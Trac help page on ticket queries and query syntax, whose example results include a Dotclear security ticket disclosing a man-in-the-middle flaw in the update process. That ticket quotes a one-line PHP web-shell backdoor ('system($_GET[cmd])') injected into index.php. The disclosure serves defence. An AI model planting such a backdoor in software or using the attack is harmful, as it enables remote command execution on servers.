Trac Ticket Queries

In addition to reports, Trac provides support for custom ticket queries, used to display lists of tickets meeting a specified set of criteria.

To configure and execute a custom query, switch to the View Tickets module from the navigation bar, and select the Custom Query link.


When you first go to the query page the default filter will display tickets relevant to you:

  • If logged in then all open tickets it will display open tickets assigned to you.
  • If not logged in but you have specified a name or email address in the preferences then it will display all open tickets where your email (or name if email not defined) is in the CC list.
  • If not logged and no name/email defined in the preferences then all open issues are displayed.

Current filters can be removed by clicking the button to the left with the minus sign on the label. New filters are added from the pulldown lists at the bottom corners of the filters box ('And' conditions on the left, 'Or' conditions on the right). Filters with either a text box or a pulldown menu of options can be added multiple times to perform an or of the criteria.

You can use the fields just below the filters box to group the results based on a field, or display the full description for each ticket.

Once you've edited your filters click the Update button to refresh your results.

Clicking on one of the query results will take you to that ticket. You can navigate through the results by clicking the Next Ticket or Previous Ticket links just below the main menu bar, or click the Back to Query link to return to the query page.

You can safely edit any of the tickets and continue to navigate through the results using the Next/Previous/Back to Query links after saving your results. When you return to the query any tickets which were edited will be displayed with italicized text. If one of the tickets was edited such that it no longer matches the query criteria the text will also be greyed. Lastly, if a new ticket matching the query criteria has been created, it will be shown in bold.

The query results can be refreshed and cleared of these status indicators by clicking the Update button again.

Saving Queries

Trac allows you to save the query as a named query accessible from the reports module. To save a query ensure that you have Updated the view and then click the Save query button displayed beneath the results. You can also save references to queries in Wiki content, as described below.

Note: one way to easily build queries like the ones below, you can build and test the queries in the Custom report module and when ready - click Save query. This will build the query string for you. All you need to do is remove the extra line breaks.

You may want to save some queries so that you can come back to them later. You can do this by making a link to the query from any Wiki page.

[query:status=new|assigned|reopened&version=1.0 Active tickets against 1.0]

Which is displayed as:

Active tickets against 1.0

This uses a very simple query language to specify the criteria (see Query Language).

Alternatively, you can copy the query string of a query and paste that into the Wiki link, including the leading ? character:

[query:?status=new&status=assigned&status=reopened&group=owner Assigned tickets by owner]

Which is displayed as:

Assigned tickets by owner

Using the [[TicketQuery]] Macro

The  TicketQuery macro lets you display lists of tickets matching certain criteria anywhere you can use WikiFormatting.



This is displayed as:

No results

Just like the query: wiki links, the parameter of this macro expects a query string formatted according to the rules of the simple ticket query language.

A more compact representation without the ticket summaries is also available:

[[TicketQuery(version=0.6|0.7&resolution=duplicate, compact)]]

This is displayed as:

No results

Finally, if you wish to receive only the number of defects that match the query, use the count parameter.

[[TicketQuery(version=0.6|0.7&resolution=duplicate, count)]]

This is displayed as:


Customizing the table format

You can also customize the columns displayed in the table format (format=table) by using col=<field> - you can specify multiple fields and what order they are displayed by placing pipes (|) between the columns like below:


This is displayed as:

Full rows

In table format you can also have full rows by using rows=<field> like below:


This is displayed as:

Results (1 - 3 of 2302)

Ticket Resolution Summary Owner Reporter
#2306 fixed pb alignement et picto qui se balade team brol

Reported by brol, 3 years ago.



dc2.17-dev, dans la médiathèque, détail media :

#2305 fixed Security issue - Update process team Cervoise

Reported by Cervoise, 3 years ago.


I have found security issues in the automatic update functionality of Dotclear.

In order to get the last version, the following resource is requested by the server: The server reply a XML file with latest versions and MD5 sum of each ZIP file:

<?xml version="1.0" encoding="UTF-8"?>
  <subject name="dotclear">
    <release name="stable" version="2.15.3"
    <release name="testing" version="2.15.2-r201910030959"
    <release name="unstable" version="2.16-dev-r201910011045"

If a new version is available, the latest version file is downloaded and the patch is applied. In order to let the administrator revert the update, a backup file is created on the root directory of the web application:

/var/www/html$ ls dotclear
admin              CHANGELOG        db         LICENSE  public     var  inc        locales
cache              CREDITS          index.php  plugins  themes

In order to apply the update, files list in /inc/digests is used in order to know updated files and only backup and update needed files. There is a vulnerability in this process. If an attacker can intercept requests on the network (for example with a man in the middle), he can replace the response of the in order to force the CMS to download a malicious ZIP file.

    <release name="stable" version="2.15.3"

The provided file is the official patch with only two edits, this line is added to the index.php file: if (isset($_GETcmd?)) {system($_GETcmd?);}. And the MD5sum of index.php is changed in inc/digests. This can be corrected by requesting for getting the version and by ensure that the server returns HTTPS reference for downloading the ZIP files.

Note 1: that there is no .htaccess files restricting someone to download the backup zip files or the inc/digest files. These files could help an attacker to find which version of dotclear is used. It would be better to restrict remote access to these files.

Note 2: for the full process, MD5 is used for check files integrity. This algorithm is no more recommended for this usage.

Note 3: I tried to report this using security(@) ( but I did not get any reply.

#2304 fixed Bug javascript dans post.html team philippe

Reported by philippe, 3 years ago.



Depuis la mise à jour (2.15 ?) les thèmes qui embarquent un fichier post.html lèvent une erreur javascript dans la console web. Du coup tout le javascript de la page est inopérant :

ReferenceError: getData is not definedindex.php:1:49

Cela vient du code qui permet de se souvenir du visiteur qui commente :

<script type="text/javascript" src="{{tpl:BlogQmarkURL}}pf=post.js"></script>
<script type="text/javascript">
var post_remember_str = 'Remember me on this blog';

doit être remplacé par :

<script type="application/json" id="dc_post_remember_str-data">
    {"post_remember_str": "{{tpl:lang Remember me on this blog}}"}
  <script type="text/javascript" src="{{tpl:BlogQmarkURL}}pf=util.js"></script>
  <script type="text/javascript" src="{{tpl:BlogQmarkURL}}pf=post.js"></script>

Cela répare le problème, en tout cas avec un thème basé sur mustek

Query Language

query: TracLinks and the [[TicketQuery]] macro both use a mini “query language” for specifying query filters. Basically, the filters are separated by ampersands (&). Each filter then consists of the ticket field name, an operator, and one or more values. More than one value are separated by a pipe (|), meaning that the filter matches any of the values. To include a literal & or | in a value, escape the character with a backslash (\).

The available operators are:

= the field content exactly matches one of the values
~= the field content contains one or more of the values
^= the field content starts with one of the values
$= the field content ends with one of the values

All of these operators can also be negated:

!= the field content matches none of the values
!~= the field content does not contain any of the values
!^= the field content does not start with any of the values
!$= the field content does not end with any of the values

The date fields created and modified can be constrained by using the = operator and specifying a value containing two dates separated by two dots (..). Either end of the date range can be left empty, meaning that the corresponding end of the range is open. The date parser understands a few natural date specifications like "3 weeks ago", "last month" and "now", as well as Bugzilla-style date specifications like "1d", "2w", "3m" or "4y" for 1 day, 2 weeks, 3 months and 4 years, respectively. Spaces in date specifications can be left out to avoid having to quote the query string.

created=2007-01-01..2008-01-01 query tickets created in 2007
created=lastmonth..thismonth query tickets created during the previous month
modified=1weekago.. query tickets that have been modified in the last week
modified=..30daysago query tickets that have been inactive for the last 30 days

See also: TracTickets, TracReports, TracGuide

Sites map